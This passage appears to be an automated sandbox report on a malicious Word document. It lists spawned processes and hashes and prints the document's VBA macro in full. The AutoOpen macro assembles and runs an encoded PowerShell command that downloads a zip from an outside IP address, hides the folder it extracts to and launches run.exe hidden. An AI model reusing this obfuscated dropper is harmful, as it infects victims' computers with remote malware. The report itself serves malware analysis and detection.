                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:18:13:21
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
                                                  Imagebase:0x7ff6585d0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:18:13:21
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:18:13:21
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\notepad.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
                                                  Imagebase:0x7ff7c9fc0000
                                                  File size:201'216 bytes
                                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:16
                                                  Start time:18:13:31
                                                  Start date:20/12/2024
                                                  Path:C:\Users\user\p4yx0rl0s3\run.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\p4yx0rl0s3\run.exe"
                                                  Imagebase:0x7ff63d270000
                                                  File size:6'138'219 bytes
                                                  MD5 hash:CD860C78E0374DEC3A2B1A73507FCE4A
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:18:13:31
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:18:13:31
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
                                                  Imagebase:0x7ff6585d0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:18:13:32
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:18:13:32
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\notepad.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
                                                  Imagebase:0x7ff7c9fc0000
                                                  File size:201'216 bytes
                                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:22
                                                  Start time:18:13:39
                                                  Start date:20/12/2024
                                                  Path:C:\Users\user\p4yx0rl0s3\run.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\p4yx0rl0s3\run.exe"
                                                  Imagebase:0x7ff63d270000
                                                  File size:6'138'219 bytes
                                                  MD5 hash:CD860C78E0374DEC3A2B1A73507FCE4A
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Rust
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:18:13:39
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:18:13:40
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt"
                                                  Imagebase:0x7ff6585d0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:18:13:40
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:18:13:40
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\notepad.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt
                                                  Imagebase:0x7ff7c9fc0000
                                                  File size:201'216 bytes
                                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Call Graph

                                                  • Entrypoint
                                                  • Decryption Function
                                                  • Executed
                                                  • Not Executed
                                                  • Show Help
                                                  callgraph 2 AutoOpen Run:1

                                                  Module: NewMacros

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "NewMacros"

                                                  APIsMeta Information

                                                  Run

                                                  IWshShell3.Run("powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==") -> 0
                                                  StringsDecrypted Strings
                                                  "Wscript.Shell"
                                                  LineInstructionMeta Information
                                                  2

                                                  Sub AutoOpen()

                                                  4

                                                  Dim Str as String

                                                  executed
                                                  6

                                                  Str = Str + "powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG"

                                                  7

                                                  Str = Str + "0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBh"

                                                  8

                                                  Str = Str + "AG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbw"

                                                  9

                                                  Str = Str + "BwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEA"

                                                  10

                                                  Str = Str + "bAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG"

                                                  11

                                                  Str = Str + "4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABG"

                                                  12

                                                  Str = Str + "AGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQ"

                                                  13

                                                  Str = Str + "B4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4A"

                                                  14

                                                  Str = Str + "egBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAH"

                                                  15

                                                  Str = Str + "QAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBn"

                                                  16

                                                  Str = Str + "AG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQ"

                                                  17

                                                  Str = Str + "BvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAA"

                                                  18

                                                  Str = Str + "IgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA=="

                                                  20

                                                  CreateObject("Wscript.Shell").Run Str

                                                  IWshShell3.Run("powershell -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==") -> 0

                                                  executed
                                                  21

                                                  End Sub

                                                  Module: ThisDocument

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "ThisDocument"

                                                  2

                                                  Attribute VB_Base = "1Normal.ThisDocument"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = True

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Reset < >
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2392861976
                                                    • Opcode ID: 92bfb6ae331aea5df8ee1c13c12ecdf0f795e88bfbc51dfd147d8b0f4969b7f8
                                                    • Instruction ID: ee0a32037891a213c413925268fdb2d05f1c1bc3c2131a994f01b8ade4e1bf02
                                                    • Opcode Fuzzy Hash: 92bfb6ae331aea5df8ee1c13c12ecdf0f795e88bfbc51dfd147d8b0f4969b7f8
                                                    • Instruction Fuzzy Hash: 1771F4F470420AAFCB159F68C840B7E3BA2FF45290F14846AE805CB297DBB5DD85C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                    • API String ID: 0-1420252700
                                                    • Opcode ID: cfe18a1ebc3593502cb069da33c7deaed23707988312565717bfe641d0b653e8
                                                    • Instruction ID: bacf533152211b6c8be4f40bcdfb738cac2fead000cd5e0af2faad836318a923
                                                    • Opcode Fuzzy Hash: cfe18a1ebc3593502cb069da33c7deaed23707988312565717bfe641d0b653e8
                                                    • Instruction Fuzzy Hash: 06A149B1B043069FDB158B789810B7ABBA6EFC2760F14887EDD058B345DBB2D846C791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                    • API String ID: 0-2049395529
                                                    • Opcode ID: 5b5f15dd750d269ef7700aad33f4d5631e29160d5cce096f7f165c3046000366
                                                    • Instruction ID: a65f1350c1874b85f6048fcd992249a092487f63263a2fae7ab5da3e74b8a0bd
                                                    • Opcode Fuzzy Hash: 5b5f15dd750d269ef7700aad33f4d5631e29160d5cce096f7f165c3046000366
                                                    • Instruction Fuzzy Hash: 4FA18CB17043499FC7219778851076ABBA59F82361F2488BBD909CB352DBB6CC86C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: 7cc9f29ba0e4c77fb3a8fd36367521da57bba74d82f64b7a3b810d5a4174469d
                                                    • Instruction ID: 8c3924375ba7437310fc5349dbcfa325262bc60591fef84f3708f3a0423bf4f4
                                                    • Opcode Fuzzy Hash: 7cc9f29ba0e4c77fb3a8fd36367521da57bba74d82f64b7a3b810d5a4174469d
                                                    • Instruction Fuzzy Hash: A74126F4A1420ADFDB248F64C9447B937A1FF42390F058866EC158F2A3CBB5C985C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q
                                                    • API String ID: 0-831282457
                                                    • Opcode ID: 9db56389936db3ed06215260255afad840961ce302fc02d215b7907c36596060
                                                    • Instruction ID: 843e19c7635949ec7ca7a726181c95e242503d7e7dea7a9a881fdc429408b760
                                                    • Opcode Fuzzy Hash: 9db56389936db3ed06215260255afad840961ce302fc02d215b7907c36596060
                                                    • Instruction Fuzzy Hash: E8F128F0B042168FCB299F78954067ABBE2EF86250F1488BAD805CB352DB71DD45C7E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q
                                                    • API String ID: 0-2697143702
                                                    • Opcode ID: 0372e6fd758f9fea92b3a10a70347bd1b24037da6c9c26c80193508304c7c9ed
                                                    • Instruction ID: cea47a8c9791df2330f9c1607e2abcfa5d6eb01be7e3194fc8df378b1e83f822
                                                    • Opcode Fuzzy Hash: 0372e6fd758f9fea92b3a10a70347bd1b24037da6c9c26c80193508304c7c9ed
                                                    • Instruction Fuzzy Hash: 21C147F1B043069FCB159B78984466ABBE3EFC6290F14887AD815CB351DB72C865C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 11a2189173856cae41753e55a6459ccbfc08e72932c22e2f6ee2bf13d29b7749
                                                    • Instruction ID: 5b318e1ac8b9684cdabb155882805df4dade94161caa21892beef0017117a26b
                                                    • Opcode Fuzzy Hash: 11a2189173856cae41753e55a6459ccbfc08e72932c22e2f6ee2bf13d29b7749
                                                    • Instruction Fuzzy Hash: 682128F5A043479FCB215B6489103767BE2DF43795F0848AACC45CB292E771C565CBB1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 62c6878b2ed45ca438a7d83bd1b3923e871f83d712ea1b0c128312aa436e9d2d
                                                    • Instruction ID: 94ae723ed2c4f8cc68c7606a898979f90c417de53cd3a3b96bb3e98580518a5c
                                                    • Opcode Fuzzy Hash: 62c6878b2ed45ca438a7d83bd1b3923e871f83d712ea1b0c128312aa436e9d2d
                                                    • Instruction Fuzzy Hash: 1B11B2F5A0430BEFEF208F7585007BAB7A5EF857A0F14886AED0496245D7B1C945CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edf4fae79aa47006ad5a832c3d5e10c25f176ed332705c38ef940111ca9a3c0b
                                                    • Instruction ID: a8e61de9d053adf739b3080b1dcd94f78b09b7a5206a2efc7c98e3af549036dc
                                                    • Opcode Fuzzy Hash: edf4fae79aa47006ad5a832c3d5e10c25f176ed332705c38ef940111ca9a3c0b
                                                    • Instruction Fuzzy Hash: 84916174B012149FCB04DFB9D5849AEBBF2FF89204B1580AAE819EB351DB35EC45CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c30ffb1387b27f500949490cda63515200420ae6962f239d56c65882b9f5ebe7
                                                    • Instruction ID: 2784c5aaa7bab4829a15edd30524e06998a004a7aee33360ac894bc3df5daa19
                                                    • Opcode Fuzzy Hash: c30ffb1387b27f500949490cda63515200420ae6962f239d56c65882b9f5ebe7
                                                    • Instruction Fuzzy Hash: 81919BB4A002558FCB15CF58C598AAEFBF1FF48314B248599E815AB3A5C736FC51CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15ed0b9bdb38b5a47efd7a493bd0fb2376de897bd65b26c6cf74e839c19b07b1
                                                    • Instruction ID: 71f4917a902c55f109f1f2e2fca45cf463228ed658724038c41de4ef96e80cab
                                                    • Opcode Fuzzy Hash: 15ed0b9bdb38b5a47efd7a493bd0fb2376de897bd65b26c6cf74e839c19b07b1
                                                    • Instruction Fuzzy Hash: 86815D70A013149FCB14DFB8D594AAEB7F2BF89304F14896DD456AB391CB35AC45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b90b9dbef15978b2e4e740d5c894911a2ce6f00a6b6757187551de432dcc237
                                                    • Instruction ID: 5c0497cb152d29d09bb1b1b0d721d194643205a5ce130fb41467070f090033c4
                                                    • Opcode Fuzzy Hash: 3b90b9dbef15978b2e4e740d5c894911a2ce6f00a6b6757187551de432dcc237
                                                    • Instruction Fuzzy Hash: EF818234A023549FCB15DFA4C984AADBBF2BF89314F1884A9E445AB362D735EC45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61ec4e392b4724b11ec0010794c7ff396d34425a465b7c5b8a534e300bc38d3a
                                                    • Instruction ID: 578b2d6530e1fb26182d198e4e325cc752aa12b5495cbd260fb8c6fc872dd803
                                                    • Opcode Fuzzy Hash: 61ec4e392b4724b11ec0010794c7ff396d34425a465b7c5b8a534e300bc38d3a
                                                    • Instruction Fuzzy Hash: 8E715C70A013149FDB15DFB8C594AAEBBF1AF8A204F14896DD452AB3A1CB31AC45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7d9d58d692378e2b8beb1c402f525feca1b784492b0e71d10ef7dadfbed5ef6
                                                    • Instruction ID: 25ec1505d8ffcd90247f277fe9b257343ca9267d7521a2ddd6bccfe08c963aee
                                                    • Opcode Fuzzy Hash: a7d9d58d692378e2b8beb1c402f525feca1b784492b0e71d10ef7dadfbed5ef6
                                                    • Instruction Fuzzy Hash: E641BD70704690EFCA64DE289260D6BF7E1BB64B0CBD8A55DE587CBB04E661FC40DB04
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 708b9afc7674ab6ab93059a1451dde88731a5cf92475cc3f029fb9b31b051663
                                                    • Instruction ID: b4eb1207251f5c8cc6c6924bbf5a814eb100a01f0619fc551d91baf0ce0a4012
                                                    • Opcode Fuzzy Hash: 708b9afc7674ab6ab93059a1451dde88731a5cf92475cc3f029fb9b31b051663
                                                    • Instruction Fuzzy Hash: 61416735A0E3945FC703DB68E9604DDBFB1EF4B220B1941D7E480DB263D6259D48CBA5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ece81027cf837bdf2fe681ebd836104c64707c1005e5bf14dda34668582398d
                                                    • Instruction ID: 44a52b83c6d5ad5dc5283766eebdaf9631d3d1cff178430799543f435de7b1e0
                                                    • Opcode Fuzzy Hash: 6ece81027cf837bdf2fe681ebd836104c64707c1005e5bf14dda34668582398d
                                                    • Instruction Fuzzy Hash: 7A51E634A00219EFDB05CFA8D594A9DFBF2BF88314F248558E405AB365C771ED86CB90
                                                    Memory Dump Source
